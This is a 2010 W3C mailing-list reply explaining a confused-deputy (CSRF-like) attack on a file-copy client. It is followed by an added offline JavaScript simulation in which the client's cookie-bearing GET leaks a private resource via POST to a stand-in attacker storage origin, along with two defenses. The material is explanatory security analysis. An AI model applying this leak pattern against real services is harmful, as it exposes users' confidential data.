Re: [UMP] Server opt-in

From: Tyler Close <tyler.close@gmail.com>
Date: Thu, 14 Jan 2010 16:33:44 -0800
Message-ID: <5691356f1001141633m575de8bfmec61127c40f065bb@mail.gmail.com>
To: Adam Barth <w3c@adambarth.com>
Cc: "Mark S. Miller" <erights@google.com>, public-webapps <public-webapps@w3.org>
On Thu, Jan 14, 2010 at 11:34 AM, Adam Barth <w3c@adambarth.com> wrote:
> On Thu, Jan 14, 2010 at 9:20 AM, Tyler Close <tyler.close@gmail.com> wrote:
>> The confidentiality of a resource can be compromised by a CSRF
>> vulnerability in a legitimate client.
>
> Can you define what you mean by CSRF?  I think we must have different
> ideas about what the term means because I don't understand that
> sentence.

I should have said CSRF-like, by which I mean a Confused Deputy
attack. I've been using the former term since some people find it
easier to understand.

For example, imagine a client using a third-party storage service. To
copy data from one file to another, they do a GET on one URL for the
source file, followed by a POST to another for the destination file.
If the storage service is an attacker, it could tell the client the
source file's URL is the URL for a resource the client can read, but
the storage server cannot. The confidentiality of this resource is
then compromised by a legitimate client that fell victim to a
CSRF-like attack.

--Tyler

-- 
"Waterken News: Capability security on the Web"
http://waterken.sourceforge.net/recent.html
Received on Friday, 15 January 2010 00:34:18 GMT
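The copy flow described in the message, as an added example that is not part of the original post and not code from UMP or Waterken: a constructed, offline simulation of a legitimate client that fetches a copy job from a storage service, GETs the source URL and POSTs the bytes to the destination. The origins, paths, cookie value, the "/copy-job" manifest and the helper names are assumptions made for illustration. It runs the same client three ways: with ambient cookie authority attached to every request (the confused deputy leaks the private resource to the attacker's service), with uniform credential-less requests (the private origin refuses, since the request carries no authority the attacker lacks), and with a client-side check that refuses to act as a deputy for URLs outside the service it is talking to.

```javascript
// Added example (not code from the original message or from UMP): a
// constructed, offline simulation of the copy flow described above. The
// origins, paths, cookie value and the "copy-job" manifest are assumptions
// made for illustration.

const PRIVATE_ORIGIN = "https://private.example";           // assumed
const STORAGE_ORIGIN = "https://storage.attacker.example";  // assumed (the attacker's service)
const PRIVATE_SECRET = "constructed payroll data";          // constructed sample content

// Ambient authority: the browser attaches this cookie to every credentialed
// request to PRIVATE_ORIGIN, no matter who chose the URL.
const cookieJar = { [PRIVATE_ORIGIN]: "session=user-abc" };

// Everything the attacker's storage service has received via POST.
const attackerInbox = [];

// Minimal in-memory "network": dispatches a request to the handler for its origin.
function serve(req) {
  const url = new URL(req.url);
  if (url.origin === PRIVATE_ORIGIN) {
    // The private resource is protected only by the session cookie.
    return req.headers.cookie === cookieJar[PRIVATE_ORIGIN]
      ? { status: 200, body: PRIVATE_SECRET }
      : { status: 403, body: "" };
  }
  if (url.origin === STORAGE_ORIGIN) {
    if (req.method === "GET" && url.pathname === "/copy-job") {
      // The malicious service names, as the copy source, a URL that the
      // client can read but the service itself cannot.
      return {
        status: 200,
        body: JSON.stringify({ source: PRIVATE_ORIGIN + "/payroll",
                               dest: STORAGE_ORIGIN + "/files/copy" }),
      };
    }
    if (req.method === "POST") {
      attackerInbox.push(req.body);
      return { status: 201, body: "" };
    }
  }
  return { status: 404, body: "" };
}

// Client-side request issuer. credentials "include" models an ordinary
// cookie-bearing request; "omit" models a uniform request that carries no
// ambient authority, so its outcome depends only on the URL itself.
function request(method, url, { credentials = "include", body } = {}) {
  const headers = {};
  const cookie = cookieJar[new URL(url).origin];
  if (credentials === "include" && cookie) headers.cookie = cookie;
  return serve({ method, url, headers, body });
}

// The legitimate client: ask the service for the job, GET the source, POST the
// bytes to the destination. It trusts the service to choose both URLs.
// `allowedSourceOrigins`, when given, is the client-side check that refuses
// to act as a deputy for URLs outside the service it is actually talking to.
function runCopyClient({ credentials = "include", allowedSourceOrigins } = {}) {
  const job = JSON.parse(request("GET", STORAGE_ORIGIN + "/copy-job", { credentials }).body);
  if (allowedSourceOrigins && !allowedSourceOrigins.includes(new URL(job.source).origin)) {
    return { copied: false, reason: "source origin not allowed" };
  }
  const src = request("GET", job.source, { credentials });
  if (src.status !== 200) return { copied: false, reason: "source returned " + src.status };
  request("POST", job.dest, { credentials, body: src.body });
  return { copied: true };
}

function leakedToAttacker() { return attackerInbox.includes(PRIVATE_SECRET); }
function resetAttackerInbox() { attackerInbox.length = 0; }

// Stand-alone run: the credentialed client leaks the secret; a uniform
// (credential-less) client, or one that checks the source origin, does not.
console.log("credentialed:", runCopyClient(), "leaked:", leakedToAttacker());
resetAttackerInbox();
console.log("uniform:", runCopyClient({ credentials: "omit" }), "leaked:", leakedToAttacker());
resetAttackerInbox();
console.log("origin check:", runCopyClient({ allowedSourceOrigins: [STORAGE_ORIGIN] }),
            "leaked:", leakedToAttacker());
```

The point the simulation makes is the one in the message: the client is not malicious, and the storage service never touches the private origin itself; the leak happens because the client's GET carries authority (the cookie) that the attacker lacks, and the attacker chose the URL it is spent on. With uniform requests the client's authority is exactly what the URL conveys, so naming a URL the attacker could not already read gains it nothing. The origin allow-list is the complementary client-side check when credentialed requests cannot be avoided.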